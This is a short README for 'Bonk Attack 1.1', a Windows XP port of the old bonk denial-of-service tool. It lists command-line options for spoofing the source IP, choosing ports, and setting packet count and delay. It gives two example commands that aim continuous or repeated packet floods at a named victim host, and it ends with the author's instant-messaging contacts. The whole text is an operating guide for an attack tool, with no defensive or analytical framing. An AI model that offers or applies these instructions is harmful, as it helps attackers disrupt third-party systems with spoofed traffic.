
  Bonk Attack Version 1.1
  =======================

  This program is the port of bonk attack to Windows XP.

  Note: This program is only tested on Windows XP.


  I. USAGE
  =======================

  bonk.exe <victim> [options]

  Options:
    -S    Spoof host     (0 is random (default))
    -s:   Src port       (0 is random (default))
    -p:   Dst port       (0 is random (default))
    -n:   Num of packets (0 is continuous (default))
    -d:   Delay (in ms)  (default 0)


  Example I: bonk www.xnet.org -S 31.32.33.34

  On this attack:

  - Victim: www.xnet.org
  - Source IP: 31.32.33.34
  - Source Port: Random
  - Destination Port: Random
  - Count: Continuous
  - Delay: 0 ms (no delay between packets)


  Example II: bonk www.xnet.org -p 7 -n 1000 -d 10

  On this attack:

  - Victim: www.xnet.org
  - Source IP: Random
  - Source Port: Random
  - Destination Port: 7
  - Count: 1000 times
  - Delay: 10 ms


  II. CONTACT
  =======================
  MSN: metinsdr@hotmail.com
  UIN: 470734

